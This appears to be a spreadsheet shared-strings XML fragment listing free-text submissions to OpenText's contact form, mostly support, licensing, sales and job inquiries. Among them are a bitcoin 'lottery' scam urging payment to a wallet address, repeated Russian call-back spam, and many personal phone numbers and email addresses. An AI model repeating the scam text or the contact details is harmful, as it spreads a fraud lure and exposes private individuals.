  </si>
  <si>
    <t>CV</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону 8 (499) 110-80-56 Олег</t>
  </si>
  <si>
    <t>Hello! You won $ 1950 today, I'm sure of that. _x000D_
 _x000D_
Because it is a bitcoin win-win lottery! _x000D_
 _x000D_
One cryptocurrency multimillionaire who wished to remain incognito organized it. _x000D_
 _x000D_
You just need to send 0.05 bitcoins to the specified wallet and within 3 hours 0.35 bitcoins will come to your wallet that equals $ 1950. _x000D_
 _x000D_
You can participate once a day. The lottery will be held until November 25, 2018. _x000D_
 _x000D_
Hurry up to get your $ 1950 for this day. Send 0.05 bitcoins to the selected wallet for your game: 1CEsnijaNjSP8U1XQnYmUukzJ5d6gs8fzX</t>
  </si>
  <si>
    <t>AAA内容物AAA</t>
  </si>
  <si>
    <t>Getting a message License is not Valid._x000D_
Invalid license._x000D_
Unable to load files._x000D_
Network license communication error.</t>
  </si>
  <si>
    <t>We are a private 100 hospital in eastern province in Saudi Arabia. One of our strategic objectives is to reduce paper use hospital wide. In this paperless environment, we have an issue to track documents related to a subject. Some documents are e-mail(s), e-mail attachment(s), soft copy file in shared folder(s) or private folder(s), photo(s) on PC or smart device, Video(s) and some are still paper(s). When we need to track a subject, we should search in different places. We may miss file(s) or document(s) because no index or container which shows all related components. Add to them waste of time. It takes a lot of time to search in different devices or locations._x000D_
 _x000D_
We may require at next stage to do archiving for patient paper medical files._x000D_
 _x000D_
We are looking for a solutions which can combine all what we have under one title to be easy to review. We need approval cycle to approve document(s). We need authorization control, who can access what and for how long. Authorization preferred to be field level authentication access. We need audit trail option. This is what we are looking for currently.      _x000D_
 _x000D_
Let me know how you can help us address our issues.</t>
  </si>
  <si>
    <t>Sehr geehrtes OpenText-Team,_x000D_
_x000D_
im Kontext des Informatik-Studiums an der FU Berlin führen wir ein Softwareprojekt durch, bei dem es um eine Marktanalyse von Reporting-Frameworks geht. In dem Szenario des Kurses recherchieren wir für einen Kunden Software, die dieser als Teil in seine eigene Plattform integrieren kann. Dabei sind wir auf BIRT und damit auf “OpenText Analytics Designer” als BIRT-”Nachfolger” gestoßen. Dabei sind Fragen aufgekommen, die sich mit Informationen auf Ihrer Homepage leider nicht ganz beantworten ließen. Möglicherweise können Sie uns hierbei helfen:_x000D_
   • Wie ist das Lizensierungsmodell für den "Analytics Designer"?_x000D_
  • Wäre es möglich den Analytics Designer als Bestandteil in einer OpenText-fremden Plattform zu nutzen? Ist dies ein sinnvoller Einsatz?_x000D_
   • Falls ja, wie würde das Preismodell aussehen?_x000D_
  • Gibt es einen geplanten Releasezyklus für den Analytics-Designer? Falls ja, wie sind in etwa die Intervalle?_x000D_
_x000D_
_x000D_
Vielen Dank &amp; beste Grüße_x000D_
Manuel Leppert</t>
  </si>
  <si>
    <t>More information on how to get money</t>
  </si>
  <si>
    <t>Hi, _x000D_
Am looking for for job change and currently working with Accenture as general accounting opps associat. Please give me an opportunity to work with Open Text._x000D_
_x000D_
Thanks_x000D_
Neetha</t>
  </si>
  <si>
    <t>SL</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону 8(499)322-46-85 Олег</t>
  </si>
  <si>
    <t>I want to know more about this</t>
  </si>
  <si>
    <t>Interested in partnering to resell the products in the East African region. I have extensive experience and skill in the implementation of electronic content management system. I have implemented the M-Files document management system for 7 years and am now looking to venture into the market with your diversified products. I would like to learn how to configure and implement OpenText as a platform</t>
  </si>
  <si>
    <t xml:space="preserve">We sent a check to you and it was returned saying it was not able to be delivered.  I'm trying to get confirmation of your remit to address.  What we have on file is P.O. Box 31001-0828, Pasadena, CA  91110-0828.  Please confirm. </t>
  </si>
  <si>
    <t>When I go to use My Support, it says that I do not have access:_x000D_
_x000D_
"No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Almost there!_x000D_
_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Request confirmation email"_x000D_
_x000D_
_x000D_
  My account (mbrau@smartcity.com) is the Group Admin for My Support access on account, which I can see when I sign into an account (ithelpdesk@smartcity.com) that is selected as Technical.  I have clicked on the request confirmation email button multiple times and have received the email and clicked on the confirm registration link in the email multiple times._x000D_
_x000D_
Can I please have this resolved.  Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I want to make a claim. I have been teaching since 1997 till 2014 December. </t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону 8(985)473-83-74 Олег</t>
  </si>
  <si>
    <t>To withdram my share</t>
  </si>
  <si>
    <t>I work in The Hartford as documentum developer. I dont have access to raise SR in the support website. Please enable access to SRs for me under The Hartford account.</t>
  </si>
  <si>
    <t xml:space="preserve">is to get money  and start businesses  and get lost lover </t>
  </si>
  <si>
    <t>I am unsure if my accounts department paid the last invoice and I need to download the latest version of encase ASAP. Please could you let me know. Thanks</t>
  </si>
  <si>
    <t>rightfax support</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We would be interested in buying two licences of Gupta Team developper in order to maintain a tool twritten with Gupta 2.1._x000D_
_x000D_
Could you please share the procedure?_x000D_
_x000D_
Thanks_x000D_
Regards_x000D_
Adrien Taprest_x000D_
514 412-2421 _x000D_
</t>
  </si>
  <si>
    <t>I would like to speak with the new sales team associated with USPTO._x000D_
_x000D_
I would like to see how we can improve our current Endpoint solution, and what OpenText would be able to do to help us streamline some of our security scans._x000D_
_x000D_
Thanks,_x000D_
Juan</t>
  </si>
  <si>
    <t xml:space="preserve">Not able to access My Support to file support tickets, even after registering. </t>
  </si>
  <si>
    <t>I have a test method file that when clicked to open takes me here but will not open to view. File = LP-463PB-54-01 Crocking Test Method</t>
  </si>
  <si>
    <t>Contract completed</t>
  </si>
  <si>
    <t>We're upgrading from 5.6.2 to CF4 and I need access to the OpenText Streamserve 5.6.2 Upgrading instructions Reference Guide.pdf from the knowledge base. Thank you._x000D_
_x000D_
-Jeff</t>
  </si>
  <si>
    <t>I am not able to login to the Actuate integration server.I need help with that</t>
  </si>
  <si>
    <t>Good Morning, _x000D_
we are interested in sending an employee to upcoming training with your facility they will both be in Pasadena California one is the DF120 Foundations in Digital Forensics with Encase March 05, 2019&amp; the other is DF120 Building an Investigation with Encase. March 12th, 2019 I was wondering do you have hotel listings? that may offer discounts?</t>
  </si>
  <si>
    <t>We currently utilize open text to communicate through EDI. Our IT Department would like to know the contact person to ask a few questions about switching to FTP. Could you please provide our rep's information? _x000D_
_x000D_
Thank you,_x000D_
Chase Rand</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
Would someone from the product team please contact me. The company I work for is partners with Dun &amp; Bradstreet and I'd like to talk with someone about the Integration Tool currently being used on the Legal Key product. Feel free to contact me via email or my office number in the contact form. Also you can reach me at my cell 843-425-6096_x000D_
_x000D_
Thanks, </t>
  </si>
  <si>
    <t>Need help updating the default cover sheet with a confidentiality message, please call me.</t>
  </si>
  <si>
    <t xml:space="preserve">I recently submitted an application form, on behalf of Volta, Inc. (Volta), for the OpenText Business Partner Program. However, I have not yet received a response regarding the application. If possible, please provide an update on the status of our application and if Volta is being considered for the OpenText Partner Program. Thanks. </t>
  </si>
  <si>
    <t>I used to be able to check inbound/outbound EDI by going to a GXS login screen and logging in to our account. The site no longer appears to be working. I would provide the web address but this system does not allow web addresses in the "Reason for contact" field..._x000D_
_x000D_
How can I get to somewhere that I can check on an 856 ASN we sent to a customer on November 13th? I need to know the mailbag the ASN was sent in because the customer says they have not received it yet..._x000D_
_x000D_
Our company used to be known as Saturn Electronics, I don't believe that ever got changed to Flex Automotive USA when we were purchased by Flex International out of San Jose, CA.</t>
  </si>
  <si>
    <t>We need a W9 form from OpenText to pay an invoice to OpenText. Can you supply the W9 form?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am Shafaat from Avaib Software House._x000D_
_x000D_
We are one of the leading IT company in providing Web / Software / Apps Android &amp; ios Development._x000D_
_x000D_
We also provide Resources at very cost effective rates._x000D_
_x000D_
These days we are on promotion of Web and Software Development._x000D_
_x000D_
Our Expertise are WORDPRESS, HTML, CSS, JAVASCRIPT, JOOMLA, BOOT STRAP, PHP, .NET, ANDROID, IOS, J QUERY, RUBY N RAILS, ORACLE, SQL SERVER, AJAX, MY SQL, PYTHEN, DJANJO and MAGENTO etc._x000D_
_x000D_
We also provide internet marketing / calling /Facebook etc_x000D_
_x000D_
Let me know if you have any requirement will provide you best of the services._x000D_
_x000D_
You can use our profile for IT services and Solution _x000D_
_x000D_
Hope to hear from you soon.</t>
  </si>
  <si>
    <t>Pricing</t>
  </si>
  <si>
    <t>Hello, We are interested in exploring the einvoicing capabilities that OpenText can provide for the Enterprise Supply Chain. Please reach out to me to discuss further.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren_x000D_
_x000D_
Wir, die Legacy Pharmaceuticals Switzerland GmbH in Birsfelden, sind im Prozess der Einführung eines neuen ERP-Systems (SAP4/HANA). Im Rahmen dessen sind wir interessiert an Informationen zu den Themen:_x000D_
_x000D_
- Revisionssichere Archivierung_x000D_
- Archivierung Drucklisten_x000D_
- Archivierung ein-/ausgehende Dokumente (Rechnungsbelege)_x000D_
- Datenarchivierung_x000D_
- Workflow Kreditorenbuchhaltung_x000D_
_x000D_
Besten Dank für Ihr Feedback und freundliche Grüsse_x000D_
Michael Schnitzer_x000D_
IT_x000D_
Legacy Pharmaceuticals_x000D_
</t>
  </si>
  <si>
    <t>Applying for internship position</t>
  </si>
  <si>
    <t xml:space="preserve">For the purpose of integration of the OpenText Content server with our software we are developing a component for integrated document retrieval using the available API._x000D_
This development is driven from one of your customers in the Netherlands, Alliander._x000D_
_x000D_
For the purposes of development I would like to know what options of development licensing are available and/or online available environments for this purpose._x000D_
_x000D_
Currently I have seen there are Azure based virtual machine templates available, but they require a license._x000D_
_x000D_
Regards,_x000D_
_x000D_
Jasper van Rooijen_x000D_
</t>
  </si>
  <si>
    <t>We'd like a demo of your Digital Asset Management product, preferably end November/beginning December.</t>
  </si>
  <si>
    <t>Hi _x000D_
Please advise if OpenText have a Client portal where clients can view all their licenses they have in hand. _x000D_
_x000D_
Regards_x000D_
Jeseka</t>
  </si>
  <si>
    <t>Enquiry on electronic document management and archival system</t>
  </si>
  <si>
    <t>Entity and document management software</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
_x000D_
I'm interested to buy the Tableau Forensic USB 3.0 Bridge (T8u). Can you please quote me the price incl. delivery to Malta of both the bridge, USB 3.0 cable and power adapter? _x000D_
_x000D_
I believe that it comes in a Guidance soft-pouch to be easily carried around right? _x000D_
_x000D_
Regards,_x000D_
Keith Cutajar</t>
  </si>
  <si>
    <t>Dear HR,_x000D_
_x000D_
I got your reference over the Internet. I have an Overall experience of 18+ years in IT, Marketing and Soft Skill training domains. I also trained internal resources within the Organization. I have multiple skills to bring to your Workplace. _x000D_
_x000D_
I can bring my value add to work for your Organization. I also have Technical skills. I am looking for a take home Compensation that ranges between 6.0 - 6.5 Lakhs P.A along with other incentives if any. I am mentored by Art Sobczak and Grant Cardone for Inside Sales / Lead Generation positions.  I am confident that I can exceed your expectations in a short duration._x000D_
_x000D_
I can bring my experience and expertise to work for Inside Sales / Lead Generation positions at Pune. All I need is an opportunity to prove my mettle. If you are interested in a Candidate who brings multiple experience and expertise to your work table, who is willing to give all it takes and brings Value addition to your Organization, then let's talk. _x000D_
_x000D_
If age, caste, creed and other attributes are not your selection criteria except for Work Performance and results, then please feel free to write to me or reach me at 8830733474._x000D_
_x000D_
Regards,_x000D_
John Richard</t>
  </si>
  <si>
    <t xml:space="preserve">We are examining the cost/benefits ratio for centrally organizing our sales documents. These are generated by 4 independent SAP systems._x000D_
In this context, could you indicate the list price for licenses of Document Access for SAP? As weel, are there applicable discounts: on amount of licenses, on ArcelorMittal Europe agreements?_x000D_
Thanks in advance for supplying me with these figures, that I need at the latest on Tuesday Nov. 20th (for budget 2019 bookings)._x000D_
Best regards.  </t>
  </si>
  <si>
    <t>please delete my account.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning_x000D_
I am leading on the migration of data from our student record system and other legacy data sources to a new data store, and am trying to ascertain the best software for the job.  _x000D_
As there are so many ETL tools available I’d be grateful if you could provide the following information to help me form a shortlist:_x000D_
•	Is your tool suited to developing ETL solutions for migration of data between RDBMS data stores?_x000D_
•	Does it provide connectors to data sources in other formats, e.g. csv, xml?_x000D_
•	Is there a data profiling / cleansing component?_x000D_
•	Is the software designed to run on premise or SaaS?_x000D_
•	What is your licensing model (e.g. per user, per data store, per record), and are you able to provide an approximate cost?_x000D_
•	Does the cost of the license include support?_x000D_
•	Do you provide a discount for the higher education sector?_x000D_
•	Is there a free / opensource version, and if so, what are its limitations with regards the questions above?_x000D_
Thank you for your time_x000D_
Jackie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I want to buy some of your software but I can't get past the first page! When I enter my first name in the box it isn't accepted.</t>
  </si>
  <si>
    <t>Abfrage Angebot für das Produkt Invoice Management by Open SAP._x000D_
_x000D_
Sehr gerne können Sie mich unter der obenstehenden E-Mail Adresse erreichen.</t>
  </si>
  <si>
    <t>I need to know if I have money in the system</t>
  </si>
  <si>
    <t>Frage zur Lizensierung</t>
  </si>
  <si>
    <t>Hello,_x000D_
when i try to register, i always get the message "Server error"._x000D_
What should I do / How can I do ?_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are from Bajaj Finserv, one of the largest NBFCs in India. We wanted to explore your solutions for call center voice and speech analytics. It would be great if we can get in touch once to take the discussion forward_x000D_
_x000D_
Regards,_x000D_
Harish</t>
  </si>
  <si>
    <t>Hi, We would like to know our customer representative in Open text. We would like to know wheter we can get support for our SSS and other licence from Open text directly. Please send to us e-mail about this issue. Thank you.</t>
  </si>
  <si>
    <t>Hi In our company we use the open text windows image viewer. We were wondering if there is a way to see two image next to each other to be able to compare signature or other data?</t>
  </si>
  <si>
    <t>Looking for job as a network Engineer</t>
  </si>
  <si>
    <t>We lost cd that install encase forensic. How can i recieve install file? My usb number is G2002024499. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to set up time to view a demo of your digital asset management system. _x000D_
_x000D_
_x000D_
Some key functionality that I am interested in seeing during the demo are: _x000D_
-Personalization of tool _x000D_
_x000D_
-Search &amp; Navigation _x000D_
-Asset types handled – including transformation / transcoding _x000D_
-Video capabilities _x000D_
-Rights management _x000D_
-Workflow tools _x000D_
</t>
  </si>
  <si>
    <t>I've been attempting to contact Adrian Rampoldi who is the NSW Account Director and designed contact for the NSW Government (SCM0020) ICT Panel. _x000D_
I represent the NSW RFS and we are seeking out potential vendors for a new project. _x000D_
_x000D_
Contact details for Adrian Rampoldi seem incorrect on the NSW Panel. Adrian's reported email is mkang@opentext.com. _x000D_
_x000D_
Can Adrian please contact me to discuss potential interest in this project. _x000D_
_x000D_
Thanks, _x000D_
Ben Ko</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for the download link for EnCase Forensics 8.05 as the link I was given last time which says 8.05 gave me v7 when installed, even though the downloaded file says 8.05 . </t>
  </si>
  <si>
    <t>Looking for Teleform documentation</t>
  </si>
  <si>
    <t>unable to successfully login after password has been changed</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Alfonso and I work for the company Intersec S.A. de C.V. based in Mexico City, we provide services and products to our customers in government agencies and law enforcement groups._x000D_
_x000D_
We have a requirement of several customers to provide them your solution, we would like to know if we can work directly with your company or if you can provide us with the list of your partners in Mexico because the information that your website show is not updated._x000D_
_x000D_
Hope to hear about you soon._x000D_
_x000D_
Best regards,_x000D_
Alfonso</t>
  </si>
  <si>
    <t>Can I please obtain a quote for QTY 1 of EnCase Forensic for my customer AbbVie?</t>
  </si>
  <si>
    <t xml:space="preserve">we are looking for some fax to email solutions. Currently we use Birch.  We are maxed out with # of fax to email lines with them._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I cannot access the webpage that allows me to register an opportunity.  I have a time sensitive deal that might close by end of week and I would like to register.  Please contact me to assist in this.</t>
  </si>
  <si>
    <t xml:space="preserve"> please qoute and we need more info and trails OpenText™ Application Governance &amp; Archiving for Microsoft® SharePoint® (AGA)  in office365   </t>
  </si>
  <si>
    <t>I am working on EDRMS documents for our team to support our large users based to support application and very much looking forward to learn this application. Please contact me at the earliest to enroll for training session / course</t>
  </si>
  <si>
    <t>Rec'd error regarding a receipt not being rec'd.  I have sent and have received an error message:   Error_x000D_
_x000D_
The following errors were encountered while processing:_x000D_
Failed to create the new Document. Reference number should be unique._x000D_
and do not understand what this means or how to correct it. Please I have also contacted the help support desk, but have not heard back from them either. Carlyn Salas</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
I am looking for some help with a verification of employment for one of your employees. _x000D_
Can you please provide a contact email or phone number for an individual in human resources or payroll who can help me complete the verification_x000D_
</t>
  </si>
  <si>
    <t>Hello_x000D_
When doing research on the archiving products I have come across your product and submitting this form to get more information on it. below is our requirement and we would like to know if OpenText has any solution to support our product. _x000D_
" we are looking for a cloud based archiving solution which can perform archiving on our SAP Suite on HANA, BW, GTS and ATTP on-premise systems. All our systems have huge amount of data, so we would like to know if OpenText has any solution that can archive the data and store it the cloud and also lets us to retrieve the stored data from the cloud when needed. _x000D_
Please let me know if you have any product that supports our requirement._x000D_
_x000D_
Thanks_x000D_
Chandu</t>
  </si>
  <si>
    <t>We have a current VPN connection between us and Cerner, which Cerner has stated you are their VPN provider. We have recently our servers to amazon and need to know if you connect to an Amazon VPN?</t>
  </si>
  <si>
    <t>Normally, I am able to register for Enfuse by now.  I haven't seen an announcement for Enfuse 2019 (typically in Las Vegas).  Is an announcement coming soon?  I need to budget my training funds._x000D_
_x000D_
Thanks,_x000D_
Jon</t>
  </si>
  <si>
    <t>I need access to trading grid for invoicing to Comcast...how do I get invited to do that?</t>
  </si>
  <si>
    <t>I am unable to access knowledge base. I am getting below message when trying to access it. even though I confirmed the email, I am still getting the same issue. Please suggest._x000D_
_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Regards_x000D_
Vijay</t>
  </si>
  <si>
    <t>Replaced computer that Brava desktop was installed on and am reinstalling on the new one.  Received the license info via email but the installer fails and says to download the license file from your website.  Try to login and it fails.  Try to reset password and the password reset utility fails.  Super frustrating trying to install a simple product.  Please advise.</t>
  </si>
  <si>
    <t>Ladies and Gentleman,_x000D_
_x000D_
Within the scope of my seminar paper, I'am looking for possible alternativs towards SharePoint 2010 as a publishing tool in a enterpise context. After visiting your webpage I've got some questions:_x000D_
	1. Is it possible to get ECM Software for test purposes?_x000D_
	2. If yes, which requiremants have hardware to fullfill?_x000D_
	3. How complicate is the system setup?_x000D_
	4. How is the price structure build?_x000D_
I would appriciate your answer very much._x000D_
_x000D_
Cincerely yours,_x000D_
Jakob Epp</t>
  </si>
  <si>
    <t>Document Control management system.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am interested in RightFax. However, I don't see any prices. This tends to make me think the product will be too expensive for me. I receive perhaps 10 faxes a year and originate half that number. I am just trying to get rid of the fax machine._x000D_
Thanks,_x000D_
Jim</t>
  </si>
  <si>
    <t>We provide solutions for financial services companies like Barclays, Lloyds etc. to scan and control their Excel and Access databases, which are not normally under IT control (so called EUCs)._x000D_
_x000D_
A prospect has an OpenText solution, so we need to get a copy of your software, or an understanding of the data structures or any APIs etc, so we can test our scanning capability within it._x000D_
_x000D_
Note - we have no ability to hack into any files, we only open them using a read only account set up by our user's IT team. _x000D_
_x000D_
We have recently done the same project with iManage._x000D_
_x000D_
Could you contact me at the above email address or call to let me know what we can do?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Will</t>
  </si>
  <si>
    <t>I am using OpenText IRM Server Version 5.1 SP2 and have a question. Am I able to limit a user to only be able to print a document one time?I know I can allocate print permissions to certain users, but after I have done that, can I limit those users to only be able to print the document once?</t>
  </si>
  <si>
    <t xml:space="preserve">We are updating our database of all the software we use. We need to ECCN of the following APP name. Please let me know if this can be done._x000D_
ECCNs are five character alpha-numeric designations used on the Commerce Control List (CCL) to identify dual-use items for export control purposes._x000D_
_x000D_
OpenText Livelink Unlimited Servers Unlimited Usage_x000D_
OpenText Object Importer Unlimited Usage_x000D_
OpenText Fax Server Enterprise Suite_x000D_
OpenText Livelink PDF Forms Unlimited Usage_x000D_
OpenText Adlib Express Server + EFTS Non-Production Unlimited Usage_x000D_
OpenText Activator for SAP Solutions_x000D_
OpenText DocuLink for SAP Solutions Standard Named Users_x000D_
OpenText Application Governance &amp; Archiving for Microsoft SharePoint (Add on Bundle)_x000D_
OpenText Service Programs Monitoring Unlimited Usage_x000D_
OpenText ECM Everywhere ActiveView_x000D_
OpenText Brooktrout SR140 8 Chan_x000D_
OpenText RF Additional DDC_x000D_
OpenText Content Server SDK (version 9.7.1 and earlier)_x000D_
OpenText Livelink Archive (tm) for SAP (tm) R/3 (r)_x000D_
OpenText WebReports_x000D_
OpenText Appearance XML Unlimited Usage_x000D_
OpenText Enterprise Library Web Parts for Microsoft SharePoint_x000D_
OpenText SAW - ImageLinks_x000D_
OpenText Extended Collaboration Full Named Users_x000D_
OpenText Content Viewer Toolkit View Client Licenses Unlimited Usage_x000D_
OpenText Discovery Server Java Toolkit Unlimited Usage_x000D_
OpenText Performance Analyzer Unlimited Usage_x000D_
OpenText AdLib eXpress Server Professional Edition Unlimited Usage_x000D_
OpenText LiveLink Enterprise Suite_x000D_
OpenText Secure Shell_x000D_
OpenText Content Suite Platform Standard Named Users_x000D_
OpenText PDF Publishing Unlimited Usage_x000D_
OpenText Archiving for SAP Solutions Standard Named Users_x000D_
OpenText BRS/Search for NT w/NetAnswer V2.0 Unlimited Usage_x000D_
OpenText Livelink ECM - Activator for SAP Solutions Dev License_x000D_
</t>
  </si>
  <si>
    <t>We are working with a client to migrate OpenText Archive server data from File Store to Object Store (HCP). Do you have any tool available which can help with this?</t>
  </si>
  <si>
    <t>Dear Ladies and Gentlemen,_x000D_
_x000D_
I'm contacting you as I've problems to access the support section to create a new support issue for one of my customers. I've been working for the company "ecomplexx / ecx io" and was registered with my previous account "patrick.lohse@ecx.io". Now I'm working as a freelancer and that's why I changed the mail address for this account to "patrick.will@iturio.de". Also as I've married, my last name changed from "Lohse" to "Will". Whenever I'm trying to access the support section (Knowledge Base or Open a support ticket), I'm blocked by the error message: "No Access - We're sorry, your account does not grant you access to this resource." and "Almost there! - Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us. Request confirmation email". Whenever I request and confirm the verification email, the same error keeps appearing._x000D_
_x000D_
I need to contact your support regarding a bug in an active "OpenText Website Management Server (11.2)" installation für my client "Schlüter Systems KG" who has an active support license for the system. Could you please tell me if it's possible to reactivate my account and allow me to access your ticket system?_x000D_
_x000D_
Thank you very much and kind regards_x000D_
Patrick Will</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please assist me in providing the Export Control Classification Number_x000D_
(ECCN) for this product for our export compliance purposes:_x000D_
(Please advise the CCATS/ERN number and ENC restriction, if applicable.)_x000D_
_x000D_
Tableau Forensic Duplicator TD2u_x000D_
_x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t>Ideagen PLC bought PleaseTech Ltd 18 months ago. We produce a product called PleaseReview which integrates with both OTCS and Documentum. For OTCS we required licenses for our test system which we requested through our old CEO (David Cornwell). He has moved on and I need to be able to update our licenses. I am told we have a current support contract but cannot find anyone who has the details. What can I do to find these details out and have my mail ID added as a contact so I can request new licenses and software? I have created an account in your system but can't login without the support details that I can't find! Happy to provide any additional information that is needed.</t>
  </si>
  <si>
    <t xml:space="preserve">I applied for Fax2Mail service but it doesn't work. My fax# is 6782540569. Please help resolve the issue. </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
Im Rahmen eines laufenden Projektes mit unserem Kunden arbeiten wir an der "Automatisierten Anonymisierung &amp; Digitalisierung von Beschwerden".  Hier geht es konkret um eine Tool Auswahl zur Digitalisierung von eingehenden Rückmeldungen (diese sind häufig postalisch) oder alternativ outsourcing an einen externen Dienstleister zur Digitalisierung dieser Papier-Beschwerden._x000D_
Aktuell existieren noch keine weiteren funktionalen bzw. technischen Anforderungen. _x000D_
Die Hauptanforderung aktuell ist, dass die digitalisierten Inhalte vollständig anonym sein müssen (keine Rückschlüsse auf Absender, Datum, Ort, Adresse, etc.). Ist dies durch Ihre Lösung standardmäßig durchführbar oder könnte dies durch weiteres customizing vorgenommen werden?_x000D_
_x000D_
Ich freue mich auf Ihre Antwort!_x000D_
_x000D_
Viele Grüße,_x000D_
Felix Linden</t>
  </si>
  <si>
    <t>could you please send me an email address where I could send the letter for the Windows 10 update._x000D_
Kind regards_x000D_
Christina</t>
  </si>
  <si>
    <t>Enquiry on Electronic document management and archiving software for a financial institution.</t>
  </si>
  <si>
    <t>bei Rücksetzung meines Kennwortes erhalte ich immer wieder den Fehler "update Passwort failed"_x000D_
wie komme ich nun zu einem gültigen Passwort?</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону 8 (499) 490-26-28  Евгения</t>
  </si>
  <si>
    <t>Our collegague Curt.Wielfaert@digipolis.gent gets your newsletter &amp; alerts from OpenText. Please add the following people also to the newsletter while removing Curt :  pieter.vanremortel@digipolis.gent , Benjamin.gryson@digipolis.gent , Kristof.deneef@digipolis.gent , Michiel.strybol@digipolis.gent , dirk.vanhoegaerden@digipolis.gent</t>
  </si>
  <si>
    <t>benötigen Support für OpenText Viewer 16</t>
  </si>
  <si>
    <t>Looking at options for a DAM solution for this UK luxury retailer. Early stages of inception</t>
  </si>
  <si>
    <t>Hello there,_x000D_
_x000D_
I would like to apply for the Account Executive position which requires fluency in Turkish. I am a Turkish citizen with no work or resident permit in Germany. The sales territory appears as Turkey. So, three questions: _x000D_
_x000D_
- Is this position located in Germany?_x000D_
- Is this position only for those who are legally eligible to live and work in Germany?  _x000D_
- If this position requires work permit in Germany, would the company consider a candidate who doesn't yet have it?_x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Sinan</t>
  </si>
  <si>
    <t>Hi. I work for a construction company in Nottingham, UK.  We are looking for some software to enable us to measure using PDF drawings and also maybe DWG drawings for construction areas and quantities.  Can you please advise on prices for your software please? We require access for 2 people.  Kind Regards</t>
  </si>
  <si>
    <t>We are a coupé of potential attendees and our company is a customer by OpenText. I have a question about the conference pass..is it free to attend? And only cost from our side is transport and accommodation?_x000D_
Cheers_x000D_
Soeren</t>
  </si>
  <si>
    <t>request for quote</t>
  </si>
  <si>
    <t>I am a consultant for ECM/Archiving products. A customer wants to setup an archiving environment based on Archive Center 16. A high availability setup is desired. We know that we need Professional Services for a setup of AC16 active-active cluster as well as active-passive cluster. This is clear and will be ordered as soon as the customer takes the decision. The only thing is that I cannot provide any information/documentation about a active-active and active-passive installations as on OT KC I cannot find anything. This info is requested by the customer in order to select the right approach for AC16 cluster setup. Can you provide any documentation/comparision for active-active / active-passive installation (overview of landscape, technical details, etc)? (if possible also Remote-Standby)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
I am writing from Molo a Scandinavia fashion brand for children._x000D_
_x000D_
We are trading with Zappos Merchandising and have setup an EDI connection with them through DiCentral. Now we are informed that they use OpenText/GXS as their VAN._x000D_
_x000D_
I guess we need to setup an account with you so we can upload our product catalogue. _x000D_
_x000D_
Please contact me regarding this :-)_x000D_
_x000D_
Best regards Henrik Kandrup_x000D_
 </t>
  </si>
  <si>
    <t>I'm interested by the OCR solution. I want it to use it with SAP B1._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Hello_x000D_
I am trying to find the information on the product licenses we have purchased  , but I find nothing on your site (license keys etc..).  Could you please help ?_x000D_
_x000D_
thanks_x000D_
_x000D_
VK</t>
  </si>
  <si>
    <t>I clicked your LinkedIn icon and it says Page Not Found (see below)_x000D_
_x000D_
"Page not found_x000D_
Uh oh, we can’t seem to find the page you’re looking for. Try going back to the previous page or see our Help Center for more information"</t>
  </si>
  <si>
    <t>I am interested in Decisiv.  We are looking to index approximately 50 TB of network file server data in place.  We would then like to be able to select identified files for collecting and loading into our eDiscovery platform (Nuix, Relativity, Brainspace).</t>
  </si>
  <si>
    <t>We'd to join for re-seller to offer your products to one of top 3 bank in Indonesia for OCR Bank Statement with OCR. Please describe the steps to followed. Thanks</t>
  </si>
  <si>
    <t>bangladase</t>
  </si>
  <si>
    <t xml:space="preserve">jessore kashabpur </t>
  </si>
  <si>
    <t xml:space="preserve">ork_x000D_
jessore_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">farend_x000D_
</t>
  </si>
  <si>
    <t>r</t>
  </si>
  <si>
    <t>Cancel the Catalogue subscription. Customer ID: 10038040; Billing Doc: 9000808635</t>
  </si>
  <si>
    <t xml:space="preserve">Applying for a Safety Advisor position </t>
  </si>
  <si>
    <t>Receiving system outage alerts from opentect for products we do not use. e-mail address is itservcedesk@foodstuffs-si.co.nz. can you please stop sending these e-mail notifications ... Many thanks, Peter Free</t>
  </si>
  <si>
    <t>Hi, _x000D_
Could you please provide a list of courses that are geared towards Encase application suite administration? We are looking to support this application from an adminstrators perspective and would like to find course that we can attend. _x000D_
thanks</t>
  </si>
  <si>
    <t>Hello, we are interested in acquiring a development license of team developer._x000D_
_x000D_
Could you send me a quote for 1 license? regards</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Recipient ,_x000D_
Hope you are doing great , My  name is ghazali  Usmani ._x000D_
we are a distributor of leather jacket and leather goods , Our office based in pakistan ,  _x000D_
we supply leather jacket and other leather goods to various buyer and  stores , _x000D_
mainly in UK , also  selling on different online platforms , like  ebay and amazon ,_x000D_
